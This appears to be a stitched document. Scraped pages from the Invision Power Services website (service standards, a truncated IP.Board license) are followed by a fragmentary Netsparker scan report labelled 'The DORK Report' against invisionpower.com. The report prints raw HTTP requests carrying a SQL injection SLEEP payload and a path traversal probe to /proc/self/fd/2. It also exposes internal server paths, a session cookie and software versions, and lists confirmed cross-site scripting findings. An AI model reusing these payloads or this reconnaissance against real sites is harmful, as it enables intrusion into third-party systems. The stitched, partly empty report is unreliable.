<li><a href='http://www.invisionpower.com/suite/demo.php' title='Try our products'>Try our suite free</a></li>

</ul>
<script type='text/javascript'>
ips.menus['products'] = new ips.menu( $('nav_products'), $('nav_products_menu') );
</script>
</li>
<li id='nav_hosted'>
<a href='/hosting'>Hosted Communities</a>
<ul id='nav_hosted_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/hosting/' title='Go to standard packages'>Standard Packages</a></li>
<li><a href='http://www.invisionpower.com/hosting/advanced.php' title='Go to Advanced packages'>Advanced Packages</a></li>
</ul>
<script type='text/javascript'>
ips.menus['hosted'] = new ips.menu( $('nav_hosted'), $('nav_hosted_menu') );
</script>
</li>
<li id='nav_services'>
<a href='http://www.invisionpower.com/services/' title='Go to our Services overview'>Services</a>
</li>
<li id='nav_support'>
<a href='#'>Support</a>
<ul id='nav_support_menu' class='main_menu'>
<li><a href='http://community.invisionpower.com/resources/documentation/index.html' title='Documentation'> Documentation </a></li>
<li><a href='/customer/' title='Go to the client area'>Client Area</a></li>
<li><a href='http://community.invisionpower.com/index.php?app=ccs' title='Go to the resource site'>Resources</a></li>
<li><a href='http://community.invisionpower.com' title='Our community support forums'>Support Forums</a></li>

<li><a href='http://www.invisionpower.com/company/faq.php' title='Go to the FAQs'>FAQs</a></li>
<li><a href='http://www.invisionpower.com/hosting/status.php' title=''>Network Status</a></li>
</ul>
<script type='text/javascript'>
ips.menus['support'] = new ips.menu( $('nav_support'), $('nav_support_menu') );
</script>
</li>
<li id='nav_store'>
<a href='http://www.invisionpower.com/store/' title='Go to the store'>Store</a>
</li>
<li id='nav_community'>
<a href='http://community.invisionpower.com/' title='Visit our own community'>Our Community</a>
</li>
<li id='nav_contact'><a href='http://www.invisionpower.com/company/contact.php' title='Get in touch'>Contact Us »</a></li>
</ul>
</div>
<div id='container'>

<div id='page_standards'>
<div id='standards_header' class='page_header small'>
<h1>Standards of Service</h1>
</div>
<br /><br />
<p class='generic size16'>
We publish our Standards of Service as an easy to read, plain-English frequently asked questions on the how, why, and wherefore of our customer service, and what you can expect from us when you purchase our products or services.
</p>

<br /><br />
<div class='policy_menu'>
<h2 class='cufon'>Contents</h2>
<ul class='bullets' style='margin-left: 20px'>
<li><a href='#payment' title='Payment'>Payment</a></li>
<li><a href='#hoo' title='Hours of Operation'>Hours of Operation</a></li>
<li><a href='#hes' title='IPS Hosting Emergency Support'>IPS Hosting Emergency Support</a></li>
<li><a href='#ta' title='Telephone Assistance'>Telephone Assistance</a></li>
<li><a href='#tr' title='Ticket Responses'>Ticket Responses</a></li>
<li><a href='#ipb' title='IP.Board License Terms'>IP.Board License Terms</a></li>
<li><a href='#forums' title='Company Forums'>Company Forums</a></li>
<li><a href='#license' title='Software License'>Software License</a></li>

</ul>

<br /><br />
<h2 class='cufon'>More Information</h2>
<p class='generic size13'>
If you have a question that is not answered here, please don't hesitate to contact us.<br /><br />
<a href='http://www.invisionpower.com/company/contact.php' title='Contact Us'>Contact Us →</a>
</p>
</div>

<div class='policy'>
<a id='payment'></a>
<h2>Payment</h2>
<p class='generic size13'>
We accept Visa, MasterCard, American Express, and Discover credit cards. We also accept PayPal, United Kingdom Debit Cards (Delta, Maestro/Switch, Solo, Electron) and check or money order from United States, United Kingdom, Canada, or Australia.<br /><br />

We review all orders to protect both you and us from fraudulent transactions. This means that there is sometimes a delay in processing your order (up to one business day) however during business hours expect a one hour activation time. Feel free to contact customer support for order status.<br /><br />

It is our policy to deny refunds for software once it is downloaded and/or installed for you by our technicians. Please use our demo systems or contact our sales department with any questions you may have about product or service performance before you purchase.<br /><br />

Payment terms are net 5.

<br /><br />
<a id='hoo'></a>
<h2>Hours of Operation</h2>
<p class='generic size13'>
Our hours of operation are posted on the contact page at all times. Telephone assistance is only available during business hours. While we answer support tickets during off hours certain types of requests such as billing, customer service, and advanced support are examples of issues that may require advanced services only available during business hours. IPS Hosting customers have the option of after-hours emergency support if their site is not responding.
</p>

<br /><br />
<a id='hes'></a>
<h2>IPS Hosting Emergency Support</h2>
<p class='generic size13'>
We staff our system 24/7/365 but only answer general technical support questions during normal business hours. If you are an IPS Hosting customer and your site is offline after hours at any time you can submit an emergency support request which will instantly page our after-hours techs. We also offer a 24 hour emergency telephone assistance if your site is offline to notify our staff if your site is offline. Use of this emergency line if your site is online or for non-hosting issues may incur a fee.
</p>

<br /><br />
<a id='ta'></a>
<h2>Telephone Assistance</h2>
<p class='generic size13'>
Not all IPS software or services include phone support. Please be sure to check your purchase description to see if phone support is included.
</p>

<br /><br />
<a id='tr'></a>
<h2>Ticket Responses</h2>
<p class='generic size13'>
Our average response time is less than two hours but, depending on the nature of your request, it may take up to two business days for your issue to be addressed. Our technicians will work to keep you updated on your request's progress.<br /><br />

You can always view your existing tickets to see the progress of your request or what department your ticket has been assigned to. After a ticket has existed for 48 hours, you may use the management escalation feature to tag your ticket for management review if the issue is not being resolved properly. Billing, customer service, and special requests will only be answered during normal business hours.<br /><br />
IPS cannot support modifications to the software. If a modification you have installed is causing issue, our only solution will be to revert back to unmodified files.<br /><br />

In some circumstances server-level issues will impact our software's ability to execute properly. IPS cannot make adjustments to your server hosting environment to bring it within the normal environment most hosting providers use.<br /><br />

Our staff will often need access to your community admin area or server file system to diagnose a support issue. If you cannot or will not provide such access: support will be limited or unavailable.
</p>

<br /><br />
<a id='ipb'></a>
<h2>IP.Board License Terms</h2>
<p class='generic size13'>
Both the IP.Board Standard and Business license terms give you access to upgrades to the software for the first six months of your license. After six months, if you choose not to renew at the prices listed, your software will continue to operate however you will lose access to upgrades and technical support. Note that, whenever possible, security patches are made available to all customers even if you choose not to renew your service.<br /><br />

If you choose to renew your Standard license after the first six months, the renewal includes upgrades and ticket support but excludes an extension to telephone support. If you require phone support on a Standard license past the 30 day introduction you can purchase an extension through our sales department or you may upgrade to the Business license.
</p>

<br /><br />
<a id='forums'></a>
<h2>Company Forums</h2>
<p class='generic size13'>
Our company forums are provided as a convenient place for customers to interact. It is important to note that the forums are not part of customer service only an added benefit and access may be removed. We may from time to time be forced to remove an account from access to the Company Forums if someone is posting items which are disrupting other's access to the forums.
</p>

<br /><br />
<a id='license'></a>
<h2>Software License</h2>
<p class='generic size13'>
Invision Power Services, Inc.
<br /> Invision Power Board Software
<br /> End User License Agreement
<br />
<br /> <b>LICENSE</b>
<br /> Invision Power Services (IPS) grants you a non-exclusive license to use the Software on one installation to be accessable by one URL (web address) subject to the provisions in all sections of this Agreement.
<br />
<br /> <b>TERM</b>
<br /> Invision Power Board is offered under unique licensing terms varying based on your purchase choice. All license terms allow you to operate your then-installed copy of the software without further renewals or costs. Extending technical support and additional services incurs additional fees and vary based on license type chosen at purchase time.
<br />
<br /> <b>SCOPE OF GRANT</b>
<br />
<br /> <i>You may: </i>
<br /> - customize the Software's design and operation to suit the internal needs of your web site except to the extent not permitted in this Agreement
<br /> - produce and distribute modification instructions, Skin packs, or Language packs provided that they contain notification that the Skin and Language packs were exported from and originally created by Invision Power Board and/or IPS. The modifications instructions you personally create are not owned by IPS so long as they contain no proprietary coding from Invision Power Board.
<br /> - create applications which interface with the operation of the Software provided said application is an original work
<br />
<br /> <i>You may not: </i>
<br /> - permit other individuals to use the Software except under the terms listed above
<br /> - reverse engineer, disassemble, or create derivative works based on the Software for distribution or usage outside your web site
<br /> - use the Software in such as way as to condone or encourage terrorism, promote or provide pirated Software, or any other form of illegal or damaging activity
<br /> - modify and/or remove any copyright notices or labels on the Software on each page (unless copyright output removal license is purchased) and in the header of each script source file
<br /> - distribute the Software
<br /> - distribute individual copies of files, libraries, or other programming material in the Software package
<br /> - distribute or modify proprietary graphics, HTML, or CSS packaged with the Software for use in Software applications other than Invision Power Board or web sites without written permission from IPS
<br /> - modify the software to function in more than instance or location (URL, domain, subdomain, etc.) from a single set of source program files unless each location is separately licensed
<br />
<br /> <b>DISCLAIMER OF WARRANTY</b>
<br /> The Software is provided on an "AS IS" basis, without warranty of any kind, including without limitation the warranties of merchantability, fitness for a particular purpose, and non-infringement. The entire risk as to the quality and performance o..

[Possible] Internal Path Leakage (*nix)

2 TOTAL

INFORMATION

Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

Error messages should be disabled.
Remove this kind of private data from the output.

External References

OWASP - Full Path Disclosure

- /index.php

/index.php

https://www.invisionpower.com/index.php?appcomponent=SELECT%20SLEEP(25)--+&module=order_wizard&secti..

Identified Internal Path(s)

/home/invision/public_html/admin/sources/.php
/home/invision/public_html/index.php

Request

GET /index.php?appcomponent=SELECT%20SLEEP(25)--+&module=order_wizard&section=order&type=packages&list=209 HTTP/1.1
Referer: http://www.invisionpower.com/hosting/advanced.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:32:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 251
Connection: close
Content-Type: text/html

<br /><b>Warning</b>: require(/home/invision/public_html/admin/sources/.php) [<a href='function.require'>function.require</a>]: failed to open stream: No such file or directory in <b>/home/invision/public_html/index.php</b> on line <b>607</b><br />

- /ccs_forums_install/admin/index.php

/ccs_forums_install/admin/index.php

http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBEHERE/..

Identified Internal Path(s)

/proc/self/fd/2&
/proc/self/fd/2&app

Request

GET /ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBEHERE/../../../../proc/self/fd/2& HTTP/1.1
Referer: https://www.invisionpower.com/ccs_forums_install/admin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:37:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 4822
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Cache-Control" content="no-cache" /> <meta http-equiv="Expires" content="Fri, 01 January 1999 01:00:00 GMT" /> <link rel="shortcut icon" href='http://www.invisionpower.com/ccs_forums_install/favicon.ico' /> <title>Invision Power Board: Log in</title> <script type='text/javascript'> jsDebug = 1; USE_RTE = 0; isRTL = false; </script> <link rel="stylesheet" type="text/css" media='screen' href="http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=admin/skin_cp/acp.css,admin/skin_cp/acp_content.css,admin/skin_cp/acp_editor.css">  <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index.php?g=js'></script> <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=public/js/ipb.js,admin/js/acp.js,admin/js/acp.menu.js,admin/js/acp.livesearch.js,admin/js/acp.styles.js,admin/js/acp.tabs.js'></script>  <script type='text/javascript' language='javascript'> Loader.boot(); </script> <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/admin/js/acp.help.js'></script> <script type='text/javascript' language='javascript'> //<![CDATA[ ipb.vars['st'] = ""; ipb.vars['base_url'] = "http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBEHERE/../../../../proc/self/fd/2&"; ipb.vars['front_url'] = "http://www.invisionpower.com/ccs_forums_install/index.php?"; ipb.vars['app_url'] = "http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBEHERE/../../../../proc/self/fd/2&app=core&"; ipb.vars['image_url'] = "http://www.invisionpower.com/ccs_forums_install/admin/skin_cp/images/"; ipb.vars['md5_hash'] = ""; /* ---- cookies ----- */ ipb.vars['cookie_id'] = ''; ipb.vars['cookie_domain'] = ''; ipb.vars['cookie_path'] = ''; ipb.templates['close_popup'] = "<img src='http://www.invisionpower.com/ccs_forums_install/public/style_images/master/close_popup.png' alt='x' />"; ipb.templates['page_jump'] = new Template("<div id='#{id}_wrap' class='ipbmenu_content'><h3 class='bar'>Jump To Page</h3><input type='text' class='input_text' id='#{id}_input' size='8' /> <input type='submit' value='Go' class='input_submit add_folder' id='#{id}_submit' /></div>"); ipb.templates['ajax_loading'] = "<div id='ajax_loading'>Loading...</div>"; acp = new IPBACP; //]]> </script> <script type="text/javascript" src="http://www.invisionpower.com/ccs_forums_install/cache/lang_cache/1/acp.lang.js" charset="UTF-8"></script></head><body id='ipboard_body'><div id='loading-layer' style='display:none'> <div id='loading-layer-shadow'> <div id='loading-layer-inner' > <img src='http://www.invisionpower.com/ccs_forums_install/admin/skin_cp/images/loading_anim.gif' style='vertical-align:middle' /> <span style='font-weight:bold' id='loading-layer-text'>Loading Data. Please Wait...</span> </div> </div></div><script type='text/javascript'>if ( top != self ){ top.location.href = window.location.href;}Event.observe( window, 'load', function(e){ $('username').focus();});</script><form action='http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBEHERE/../../../../proc/self/fd/2&app=core&module=login&do=login-complete' method='post'><input type='hidden' name='qstring' id='qstring' value='old_adsess=../../../../../../CANTBEHERE/../../../../proc/self/fd/2&' /><div id='login'> <div id='login_controls'> <label for='username'>Username or Email Address</label> <input type='text' size='20' id='username' name='username' value=''> <label for='password'>Password</label> <input type='password' size='20' id='password' name='password' value=''> </div> <div id='login_submit'> <input type='submit' class='button' value="Log In" /> </div></div></form> </div></div></form></body></html>

The DORK Report

NETSPARKER SCAN REPORT SUMMARY

Total Requests

Average Speed

SCAN SETTINGS

VULNERABILITIES

Password Transmitted Over HTTP

Impact

Actions to Take

Remedy

/ccs_forums_install/admin/ CONFIRMED

Form target action

Request

Response

Cookie Not Marked As Secure

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

/ CONFIRMED

Identified Cookie

Request

Response

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/index.php CONFIRMED

Parameters

Request

Response

/index.php CONFIRMED

Parameters

Request

Response

/index.php CONFIRMED

Parameters

Request

Response

/index.php CONFIRMED

Parameters

Request

Response

/index.php CONFIRMED

Parameters

Request

Response

/index.php CONFIRMED

Parameters

Request

Response

Auto Complete Enabled

Impact

Remedy

Actions to Take

Required Skills for Successful Exploitation

External References

/ccs_forums_install/admin/ CONFIRMED

Identified Field Name

Request

Response

Apache Version Disclosure

Impact

Remedy

/assets/

Extracted Version

Request

Response

PHP Version Disclosure

Impact

/assets/

Extracted Version

Request

Response

OpenSSL Version Disclosure

Impact

Remedy

/assets/

Extracted Version